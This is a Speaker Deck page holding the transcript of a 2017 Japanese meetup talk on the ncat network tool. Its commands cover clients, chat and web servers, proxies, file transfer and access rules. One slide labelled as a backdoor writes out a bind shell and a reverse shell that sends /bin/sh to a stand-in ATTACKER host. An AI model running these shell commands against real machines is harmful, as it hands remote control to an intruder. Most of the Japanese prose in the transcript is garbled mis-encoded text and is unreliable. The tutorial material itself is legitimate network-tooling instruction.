Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Ncatをつかおう / Use Ncat
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Hayato Imai
June 17, 2017
Programming
3.8k
1
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
Ncatをつかおう / Use Ncat
長岡 IT開発者 勉強会 第52回勉強会
Hayato Imai
June 17, 2017
More Decks by Hayato Imai
See All by Hayato Imai
Kubernetes撤退、 その後のはてなの取り組み / kubernetes meetup tokyo number 52
hayajo
9
7.4k
Mackerelにおける Cloud Nativeへの取り組みと チームへ与えた変化 / CloudNative Days Tokyo 2020
hayajo
2
1.6k
MackerelにおけるKubernetes利用の取組みとこれから / Kubernetes Meetup Tokyo #22
hayajo
20
10k
Mackerelチームのコンテナ開発における戦略とこれから / 190722-cndt2019
hayajo
1
1.9k
AWSコンテナサービス入門 / nds60-jaws-ug
hayajo
0
3.1k
コンテナのメトリクスと モニタリングパターン / 190320-sakura-event
hayajo
6
1.8k
Mackerelコンテナエージェントによる コンテナ監視について / Mackerel Meetup #13 Tokyo
hayajo
1
10k
Docker for Mac/Windows ではじめる Kubernetes / NDS55 Docker with Kubernetes
hayajo
16
16k
Terrafromで構築するマルチクラウドプラットフォームインフラストラクチャ / NDS53 Terraform
hayajo
0
450
Other Decks in Programming
See All in Programming
セキュリティの専門家じゃなくてもできる。「セキュリティ意識」をアップデートして サプライチェーン攻撃への耐性を高めよう。
tk3fftk
5
1k
キャリア迷子上等 ─ "ない道"は自分で作ればいい
16bitidol
3
2.8k
Datadog × OpenTelemetry 入門と実践のあいだ
kn_to_maxpno
1
180
コンテキストの使い捨てをやめる — ビジネスルール駆動開発と miko —
ioki
0
270
AIを活用したE2Eテスト実装効率化のあゆみ / ebisu-mobile-14-kotetu
kotetuco
0
160
どこまでゆるくて許されるのか
tk3fftk
0
300
ADKを使って簡単にAIエージェントを作ってみよう
k1mu21
0
290
20260623_Loop Engineeringで自分の分身の問い合わせBotを作る
ryugen04
0
110
継続モナドとリアクティブプログラミング
yukikurage
3
290
エンジニアにデザインハーネスを 〜デザインプロセスを規定するためのハーネス〜 / Design harness from an engineer's perspective
rkaga
2
690
なぜ関数型プログラミングで「型」と「証明」が語られるのか #fp_matsuri
kajitack
1
410
IBM Bobを活用したレガシーアプリの最新化
oniak3ibm
PRO
1
240
Featured
See All Featured
For a Future-Friendly Web
brad_frost
183
10k
sira's awesome portfolio website redesign presentation
elsirapls
0
290
Reflections from 52 weeks, 52 projects
jeffersonlam
356
21k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
9
1.4k
GraphQLの誤解/rethinking-graphql
sonatard
75
12k
DevOps and Value Stream Thinking: Enabling flow, efficiency and business value
helenjbeal
1
260
Design in an AI World
tapps
1
260
The Curse of the Amulet
leimatthew05
2
13k
From π to Pie charts
rasagy
0
230
How to Build an AI Search Optimization Roadmap - Criteria and Steps to Take #SEOIRL
aleyda
1
2.1k
Pawsitive SEO: Lessons from My Dog (and Many Mistakes) on Thriving as a Consultant in the Age of AI
davidcarrasco
0
180
The Illustrated Children's Guide to Kubernetes
chrisshort
51
52k
Transcript
/DBUΛ͔͓ͭ͏ Ԭ*5։ൃऀษڧձୈճษڧձ /FUDBU
ࣗݾհ w )BZBUP*NBJࠓҪ൏ਓ w !IBZBKP w Πϯϑϥ୲
/FUDBU
/FUDBUͱ w ODίϚϯυ w ωοτϫʔΫͷεΠεΞʔϛʔφΠϑ w ଟతωοτϫʔΫϢʔςΟϦςΟ w 5$16%1ϓϩτίϧΛѻ͏ w
DBUͷωοτϫʔΫ൛
͍Ζ͍Ζͳ/FUDBU OD ΦϦδφϧ w W w 6CVOUV (/6൛ w
ΦϦδφϧޓ w "SDI FYUSB 0QFO#4%൛ w *1Wɺ6%4ରԠ w ίϚϯυ࣮ߦඇରԠ w $FOU04 w 049 /NBQ൛ ʢ/DBUʣ w 44-ରԠɺଟػೳ w $FOU04 OD!ODBU CVTZCPY൛ w ΄΅(/6൛ͱಉ͡ w #VTZ#PY w "MQJOF ࠓճ/NBQ൛/FUDBUͰ͋Δ/DBU ODBU Λհ͠·͢ɻ IUUQTONBQPSHODBU
/DBU ODBU ͷ͔͍͔ͭͨ
ΫϥΠΞϯτ $ ncat -C example.com 80 )551ΫϥΠΞϯτ $ ncat -C
HOST 11211 .FNDBDIFΫϥΠΞϯτ "4$** $ perl -e 'print "\x80\x00\x00\x05" . "\x00"x4 . "\x00\x00\x00\x05" . "\x00"x12 . "\x68\x65\x6c\x6c\x6f"' |\ > ncat HOST 11211 |\ > hexdump -C .FNDBDIFΫϥΠΞϯτ #*/"3:
αʔό SERVER$ ncat -l --broker HOST1$ ncat SERVER HOST2$
ncat SERVER $IBUαʔό CSPLFS SERVER$ ncat -l --chat HOST1$ ncat SERVER HOST2$ ncat SERVER $IBUαʔό DIBU $IBUαʔό SERVER$ ncat -l # σϑΥϧτϙʔτ31337 HOST1$ ncat SERVER
αʔό SERVER$ ncat -l 8080 -k \ > --sh-exec
\ > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html" CLIENT$ curl http://SERVER:8080 8FCαʔό SERVER$ ncat --ssl -l 8443 -k \ > --sh-exec \ > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html" CLIENT$ curl -k https://SERVER:8443 8FCαʔό 44-
ϓϩΩγ PROXY$ ncat -l 8080 \ > --proxy-type http
--proxy-auth user:pass CLIENT$ curl -v https://example.com \ > --proxy PROXY:8080 --proxy-user user:pass )551ϓϩΩγ PROXY$ ncat -l 1883 -k \ > --sh-exec 'ncat --ssl -i 3 test.mosquitto.org 8883' CLIENT$ MQTT_HOST=PROXY MQTT_PORT=1883 mqttcli sub -t "#" ϓϩτίϧม )551)5514 PROXY$ ncat --ssl -l 8443 -k \ > --sh-exec 'ncat -i 3 -C localhost 3000' CLIENT$ curl -k https://PROXY:8443 44-Φϑϩʔυ
ϓϩΩγ PROXY$ mkfifo f PROXY$ ncat -l 8080 -k
<f | \ > while true; do \ > openssl s_client -connect example.com:443 -quiet >f 2>/dev/null; \ > done ίωΫγϣϯϓʔϦϯά $ httpstat https://example.com/ ... DNS Lookup TCP Connection TLS Handshake Server Processing Content Transfer [ 6ms | 96ms | 371ms | 96ms | 1ms ] | | | | | namelookup:6ms | | | | connect:102ms | | | pretransfer:473ms | | starttransfer:569ms | total:570ms $ httpstat http://PROXY:8080 -H 'Host: example.com' ... DNS Lookup TCP Connection Server Processing Content Transfer [ 5ms | 0ms | 98ms | 0ms ] | | | | namelookup:5ms | | | connect:5ms | | starttransfer:103ms | total:103ms
ϑΝΠϧసૹ SERVER$ ncat -l 8080 --recv-only >out.file CLIENT$ ncat --send-only
SERVER 8080 <in.file ΫϥΠΞϯταʔόసૹ SERVER$ ncat -l 8080 --send-only <in.file CLIENT$ ncat --recv-only SERVER 8080 >out.file αʔόΫϥΠΞϯτసૹ SERVER$ ncat --ssl -l 8080 --recv-only >out.file CLIENT$ ncat --ssl --send-only SERVER 8080 <in.file 44-సૹ ΫϥΠΞϯταʔόసૹ
TARGET$ ncat -l --exec /bin/sh 8080 ATTACKER$ ncat TARGET 8080
λʔήοτʹΞΫηεՄೳͳ߹ ATTACKER$ ncat -l 8080 TARGET$ ncat --exec /bin/sh ATTACKER 8080 λʔήοτ͕/"5എޙͷ߹ όοΫυΞ
ΞΫηε੍ޚ $ ncat -l 8080 --allow 10.0.0.2 ڐՄ $ ncat
-l 8080 --deny 10.0.0.0/8 ڋ൱ ྆ํࢦఆͨ͠߹EFOZ͕༏ઌ͞Ε·͢ɻ
·ͱΊ
·ͱΊ w /FUDBUίϚϯυ͍͔ͭ͘ͷ࣮͕͋Δ w /DBUଟػೳɺ։ൃΜͳͷͰ͓͢͢Ί w ΞΠσΞ࣍ୈͰ༷ʑͳ͍ํ͕͋Δ